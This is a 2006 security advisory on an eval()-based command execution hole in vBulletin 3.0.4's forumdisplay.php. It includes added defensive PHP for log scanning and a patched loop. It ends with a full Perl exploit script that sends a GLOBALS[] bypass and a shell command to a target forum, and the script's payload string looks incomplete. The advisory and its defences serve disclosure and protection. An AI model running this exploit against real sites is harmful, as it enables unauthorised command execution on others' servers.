vBulletin forum forumdisplay.php arbitrary code execution vulnerability

Date: 2006-07-26
vBulletin forumdisplay.php Command Execution Vulnerability


vBulletin is "a powerful and widely used bulletin board system, based on PHP language and mysql database".

A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable. 

Credit:
The information has been provided by al3ndaleeb. 

Details
Vulnerable Systems:
* vBulletin version 3.0.4 and prior

Immune Systems:
* vBulletin version 3.0.5 or newer

Vulnerable code in forumdisplay.php:
if ($vboptions['showforumusers'])
{
  .
  .
  .
  .

if ($bbuserinfo['userid'])
{
  ...
  $comma = ', ';
}
...
while ($loggedin = $DB_site->fetch_array($forumusers))
{
  ...
  eval('$activeusers .= "' . $comma .
fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
  $comma = ', ';
  ...
}
...
}

Prerequisites:
* $vboptions['showforumusers'] == True: the admin must have set showforumusers ON in the vBulletin options
* $bbuserinfo['userid'] == 0: the requester must be a visitor/guest
* $DB_site->fetch_array($forumusers) == True: when the forum is requested, at least one user must be shown as viewing it
* magic_quotes_gpc must be OFF
* The unset($GLOBALS["$_arrykey"]) cleanup in init.php must be bypassed, which the advisory does with GLOBALS[]=1
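The last prerequisite gives defenders a clear signal: a GLOBALS[] parameter in a query string is never legitimate browser input. The following is an added example, not part of the advisory or of vBulletin, that scans access-log lines for that bypass aimed at forumdisplay.php. The Common Log Format, the function names and the sample lines are constructed for this illustration.

```php
<?php
// Added example, not part of the advisory: flag requests to forumdisplay.php
// whose query string carries the GLOBALS[] register_globals bypass described
// in the prerequisites. Log format and sample lines are constructed.

function parse_request(string $line): ?array
{
    // Common Log Format: host ident user [time] "METHOD /path?query HTTP/x" status size
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $parts = parse_url($m[4]);
    return [
        'client' => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $parts['path'] ?? '',
        // Decode once so GLOBALS%5B%5D and GLOBALS[] are treated alike.
        'query'  => urldecode($parts['query'] ?? ''),
        'status' => (int) $m[5],
    ];
}

function is_suspicious(array $req): bool
{
    // Only forumdisplay.php is in scope for this advisory.
    if (strcasecmp(basename($req['path']), 'forumdisplay.php') !== 0) {
        return false;
    }
    // GLOBALS[ in a query string is the bypass the preconditions require;
    // no normal forum link ever contains it.
    return stripos($req['query'], 'GLOBALS[') !== false;
}

function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parse_request($line);
        if ($req !== null && is_suspicious($req)) {
            $hits[] = $req;
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic); only the second one should match.
$sample_log = [
    '203.0.113.5 - - [26/Jul/2006:10:00:01 +0000] "GET /forumdisplay.php?f=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jul/2006:10:00:07 +0000] "GET /forumdisplay.php?GLOBALS%5B%5D=1&f=1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [26/Jul/2006:10:00:09 +0000] "GET /showthread.php?t=42 HTTP/1.1" 200 7310',
];

foreach (scan_log($sample_log) as $hit) {
    printf("%s %s %s?%s\n", $hit['time'], $hit['client'], $hit['path'], $hit['query']);
}
```

The match is deliberately on the bypass token rather than on the comma parameter, because the same GLOBALS[] trick applies to any other uninitialised variable a later bug might expose; the path filter keeps the rule narrow enough to act on.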

Workaround:
* Disable showforumusers in the vBulletin options.
* Add the line $comma = ''; before if ($vboptions['showforumusers']) so the variable is initialised before it is read.
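The vulnerable code above and the second workaround come down to one pattern: a variable that is only assigned on some paths is later interpolated into a string that eval() executes. The following is an added example, not vBulletin's code, showing the listing loop with $comma initialised up front (the advisory's workaround) and the template rendered without eval(). The function names, the static template standing in for fetch_template('forumdisplay_loggedinuser'), and the sample data are assumptions for this illustration.

```php
<?php
// Added example, not vBulletin's code: the "users viewing this forum" loop
// rewritten so that $comma is initialised before any branch can read it
// (the advisory's workaround) and the template is rendered without eval().
// Function names, the static template and the sample data are assumptions.

function render_logged_in_user(array $user): string
{
    // Static template filled with escaped data; nothing here is executed,
    // so a hostile value in a username or in any request variable is inert.
    $template = '<a href="member.php?u={userid}">{username}</a>';
    return str_replace(
        ['{userid}', '{username}'],
        [(string) (int) $user['userid'],
         htmlspecialchars($user['username'], ENT_QUOTES, 'UTF-8')],
        $template
    );
}

function build_active_users(array $loggedin_users, bool $viewer_logged_in): string
{
    // The fix: $comma gets a definite value here, so a pre-seeded global of the
    // same name (what register_globals would supply from the request) is never
    // read. The vulnerable code only assigned it for logged-in viewers.
    $comma = '';
    $activeusers = '';

    if ($viewer_logged_in) {
        $activeusers .= '(you)';
        $comma = ', ';
    }

    foreach ($loggedin_users as $user) {
        $activeusers .= $comma . render_logged_in_user($user);
        $comma = ', ';
    }
    return $activeusers;
}

// Constructed sample: a guest viewer, two members reading the forum.
$sample = [
    ['userid' => 7,  'username' => 'alice'],
    ['userid' => 12, 'username' => 'bob <b>'],
];
echo build_active_users($sample, false), "\n";
```

Initialising $comma is the minimal patch the advisory recommends; replacing the eval()-based template expansion removes the class of bug entirely, since a separator that is merely concatenated can no longer close a string literal and inject PHP, whatever value it holds.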

Exploit:
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
  local($url) = @_;

  if ($url =~ m#^(\w+):#) {
 $protocol = $1;
 $protocol =~ tr/A-Z/a-z/;
  } else {
 return undef;
  }

  if ($protocol eq "http") {
  if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
   $server = $1;
   $server =~ tr/A-Z/a-z/;

   $port = ($2 ne "" ? $2 : $http_port);
   $path = ( $3 ? $3 : '/');
   return ($protocol, $server, $port, $path);
 }
return undef;
  }
}

sub urlencode{
  my($esc) = @_;
  $esc =~ s/^\s+\s+$//gs;
  $esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
  $esc =~ s/ /\+/g;
  $esc =~ s/%20/\+/g;
  return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);

$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma=}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
     Proto => "tcp",
     PeerAddr => $target[1],
     PeerPort => $target[2],
  ) or die "\nUnable to connect\n";
 
$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;

(Source: http://www.sheup.com)